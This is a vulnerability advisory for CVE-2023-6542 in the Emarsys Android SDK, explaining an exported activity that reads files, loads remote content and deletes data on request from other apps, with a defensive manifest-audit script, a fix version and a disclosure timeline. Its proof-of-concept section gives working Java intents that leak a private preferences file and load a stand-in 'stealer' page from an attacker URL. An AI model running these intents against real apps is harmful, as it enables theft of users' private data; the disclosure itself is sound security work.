ADVISORY INFORMATION

  • Product: Emarsys SDK for Android
  • Vendor URL: https://github.com/emartech/android-emarsys-sdk
  • CWE: Improper Export of Android Application Components [CWE-926]
  • Date found: 2023-11-10
  • Date published: 2025-04-10
  • CVSSv4 Score: 8.3 (CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N)
  • CVE: CVE-2023-6542

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

VERSIONS AFFECTED

Emarsys SDK for Android <= 3.6.1

INTRODUCTION

The Emarsys SDK enables you to use Mobile Engage in a very straightforward way. By incorporating the SDK in your app, we support you, among other things, in handling credentials, API calls, tracking of opens and events as well as logins and logouts in the app.

The Emarsys SDK is open sourced to enhance transparency and to remove privacy concerns. This also means that you can always be up-to-date with what we are working on.

Using the SDK is also beneficial from the product aspect: it simply makes it much easier to send push messages through your app. You do not have to follow and implement changes in our API calls, endpoints and parameters: we do it for you in the SDK. Your only task is to use the latest version of the SDK in your app and we take care of everything else.

(from the vendor’s homepage)

VULNERABILITY DETAILS

The SDK adds the activity “com.emarsys.NotificationOpenedActivity” to any Android app that uses the SDK. This activity passes extra intent data received from other apps to its createNotificationCommand() method without validation. As part of this functionality, the PreloadedInappHandlerCommand class performs various actions based on the supplied intent data, including returning local and remote file contents as well as deleting local files.

Successful exploits can allow an attacker to read data from local files and from remote URLs into a local WebView and also delete files from the app’s private data directory.
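To check whether a build exposes this activity (or any other component) to other apps, the decoded, merged AndroidManifest.xml can be audited for exported components that have no permission guard. This is an added example, not code from the advisory or the SDK; the sample manifest, its package name and the function names are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")

def _attr(elem, name):
    return elem.get("{%s}%s" % (ANDROID_NS, name))

def effective_exported(elem):
    """Explicit android:exported wins; otherwise an <intent-filter> implies export."""
    explicit = _attr(elem, "exported")
    if explicit is not None:
        return explicit.strip().lower() == "true"
    return elem.find("intent-filter") is not None

def audit_manifest(xml_text):
    """Return (tag, name) for each exported component with no permission guard."""
    root = ET.fromstring(xml_text)
    package = root.get("package", "")
    findings = []
    for app in root.iter("application"):
        app_permission = _attr(app, "permission")  # default guard for all components
        for elem in app:
            if elem.tag not in COMPONENT_TAGS:
                continue
            name = _attr(elem, "name") or ""
            if name.startswith("."):
                name = package + name  # expand relative class names
            guarded = _attr(elem, "permission") or app_permission
            if effective_exported(elem) and not guarded:
                findings.append((elem.tag, name))
    return findings

# Constructed sample of a decoded, merged manifest (not taken from the SDK).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.shop">
  <application>
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter><action android:name="android.intent.action.MAIN"/></intent-filter>
    </activity>
    <activity android:name="com.emarsys.NotificationOpenedActivity" android:exported="true"/>
    <activity android:name=".SettingsActivity" android:exported="false"/>
    <service android:name=".SyncService" android:exported="true"
             android:permission="com.example.shop.permission.SYNC"/>
    <receiver android:name=".BootReceiver">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
  </application>
</manifest>"""

if __name__ == "__main__":
    for tag, name in audit_manifest(SAMPLE_MANIFEST):
        print("exported without permission: %s %s" % (tag, name))
```

The findings are review candidates rather than confirmed flaws: a launcher activity is exported by design, while an exported component that acts on untrusted extras, as described above, is the case to look for.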

PROOF OF CONCEPT

To leak files from the app’s private data directory:

Intent intent = new Intent(); 
intent.setClassName("app", "com.emarsys.NotificationOpenedActivity"); 
intent.setAction("OpenExternalUrl"); 
Bundle extraBundle = new Bundle(); 
String emsPayload = "{\"inapp\": {\"campaignId\": 1, \"fileUrl\":\"/data/data/app/shared_prefs/sensitive.xml\"}, \"actions\": [{\"id\":\"OpenExternalUrl\"}]}"; 
extraBundle.putString("ems", emsPayload); 
intent.putExtra("payload", extraBundle); 
startActivity(intent);

To load remote web content into an overlay:

Intent intent = new Intent();
intent.setClassName("app","com.emarsys.NotificationOpenedActivity");
intent.setAction("OpenExternalUrl");
Bundle extraBundle = new Bundle();
String emsPayload = "{\"inapp\": {\"campaignId\": 1, \"url\":\"https://crazy.hacker.url/stealer.html\"}, \"actions\": [{\"id\":\"OpenExternalUrl\"}]}";
extraBundle.putString("ems", emsPayload);
intent.putExtra("payload", extraBundle);
startActivity(intent);

SOLUTION

Update to version 3.6.2

REPORT TIMELINE

  • 2023-11-10: Discovery of the vulnerability
  • 2023-11-18: Reported to SAP via security@sap.com
  • 2023-12-08: SAP (Responsible CNA) assigns CVE-2023-6542
  • 2023-12-12: SAP discloses their limited security advisory (note #3406244)
  • 2025-04-10: Full Disclosure
